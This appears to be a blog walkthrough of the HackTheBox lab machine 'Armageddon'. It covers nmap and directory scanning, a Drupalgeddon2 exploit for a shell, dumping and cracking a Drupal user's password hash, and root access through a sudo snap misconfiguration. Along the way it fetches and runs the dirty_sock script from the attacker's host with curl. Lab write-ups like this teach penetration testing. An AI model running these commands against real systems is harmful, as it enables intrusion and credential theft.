HackTheBox: Armageddon | My Journey

First of all, i started to scan the open port using nmap

nmap -sS -A -p- 10.10.10.233

got 2 active port. port 22 for ssh service and port 80 for web server using Drupal7.

Check on browser and i found login page with some functionality like create new account, login, reset password, etc.

I try to create new account but it seems like not working 🤨.

let’s check the web directory or file lists using tools caled dirscan.

python3 dirscan.py -u 10.10.10.233

200   317B   http://10.10.10.233:80/.editorconfig
200   174B   http://10.10.10.233:80/.gitignore
200     1KB  http://10.10.10.233:80/COPYRIGHT.txt
200   109KB  http://10.10.10.233:80/CHANGELOG.txt
200     2KB  http://10.10.10.233:80/INSTALL.mysql.txt
200    18KB  http://10.10.10.233:80/INSTALL.txt
200     2KB  http://10.10.10.233:80/INSTALL.pgsql.txt
200     9KB  http://10.10.10.233:80/MAINTAINERS.txt
200    18KB  http://10.10.10.233:80/LICENSE.txt
200     5KB  http://10.10.10.233:80/README.txt
200    10KB  http://10.10.10.233:80/UPGRADE.txt
301   237B   http://10.10.10.233:80/includes    -> REDIRECTS TO: http://10.10.10.233/includes/
200    10KB  http://10.10.10.233:80/includes/
200     7KB  http://10.10.10.233:80/index.php
200     3KB  http://10.10.10.233:80/install.php
200   132KB  http://10.10.10.233:80/includes/bootstrap.inc
301   233B   http://10.10.10.233:80/misc    -> REDIRECTS TO: http://10.10.10.233/misc/
301   236B   http://10.10.10.233:80/modules    -> REDIRECTS TO: http://10.10.10.233/modules/
200     9KB  http://10.10.10.233:80/modules/
301   237B   http://10.10.10.233:80/profiles    -> REDIRECTS TO: http://10.10.10.233/profiles/
200   271B   http://10.10.10.233:80/profiles/minimal/minimal.info
200   278B   http://10.10.10.233:80/profiles/testing/testing.info
200   743B   http://10.10.10.233:80/profiles/standard/standard.info
200     2KB  http://10.10.10.233:80/robots.txt
200     3KB  http://10.10.10.233:80/scripts/
301   236B   http://10.10.10.233:80/scripts    -> REDIRECTS TO: http://10.10.10.233/scripts/
301   234B   http://10.10.10.233:80/sites    -> REDIRECTS TO: http://10.10.10.233/sites/
200     0B   http://10.10.10.233:80/sites/example.sites.php
200   151B   http://10.10.10.233:80/sites/all/libraries/README.txt
200     1KB  http://10.10.10.233:80/sites/all/modules/README.txt
200  1020B   http://10.10.10.233:80/sites/all/themes/README.txt
200   904B   http://10.10.10.233:80/sites/README.txt
301   235B   http://10.10.10.233:80/themes    -> REDIRECTS TO: http://10.10.10.233/themes/
200     2KB  http://10.10.10.233:80/themes/
200     2KB  http://10.10.10.233:80/web.config
200    42B   http://10.10.10.233:80/xmlrpc.php

well, it seem like the configuration file didn’t have enough permission so we can read it😏. Let’s find something usefull from the configuration file

after reading some documentation and opened directories on the web above, i knew that drupal site configuration was located in /sites/default/settings.php

but after i looked up the file, it dosn’t render anything 😣

so, i started to search drupal7 exploit on internet and found something that might be usefull here https://github.com/dreadlocked/Drupalgeddon2.

let’s exploit!

ruby drupallgedon2.rb 10.10.10.233

and boom, i got the shell.

let’s see the drupal conf file again

cat sites/default/settings.php

and we got the database credential

because the mysql just accept authentication from localhost and the shell doesn’t support any other terminal to run, so i use this command to execute mysql command just in one line

mysql -u drupaluser -p'cencoredPassword' drupal -e '<commands here>'

The first command that i use is SHOW TABLES and there was interesting tables

Let’s check the colums available with SHOW * FROM users and there was some credential information. Let’s get the usefull columns only with SELECT name,pass FROM users.

hmm, i found some password hashes from there. And my assumption. brucetherealadmin is the user account on this machine. Let’s check it with cat /etc/passwd | grep /bin/bash

and yeah, my assumption was right.

Because the password was hashed… can i just crack the password ?

first, i tried to identify the hashes using this website https://hashes.com/en/tools/hash_identifier and found the hash type (it was drupal7)

now i can crack the password using hashcat with these command

hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt

7900 is a drupal7 hash mode from hashcat. Reference: https://hashcat.net/wiki/doku.php?id=hashcat

And gotcha. let’s try to ssh with this credential.

got the user flag. now let’s see if i can privesc this accoynt into root🔥.

first of all, i checked sudo available command with sudo -l

i can install any snap package with root permission. let’s check the exploit on internet.

found this CVE https://github.com/initstring/dirty_sock. lets download it and use that on the machine.

on host :

git clone https://github.com/initstring/dirty_sock && cd dirty_sock
python3 -m http.server 1234

on machine :

cd /tmp
curl 10.10.16.6/dirty_sockv2.py > sock2.py && chmod +x sock2.py
./sock.py

but the script didn’t work as expected☹️

started searching again on internet and found this interesting article https://notes.vulndev.io/notes/redteam/privilege-escalation/misc-1

following step on that article, now the snap package was installed and i have new user with this credential dirty_sock:dirty_sock and i can execute all command with sudo on that account.

i can execute sudo su and becoming root user.

that’s the end! Hope you’all enjoyed my long long long (little short?) journey xD

Thank’s for reading. You can reach me in telegram if you want to talk with me. Cheers!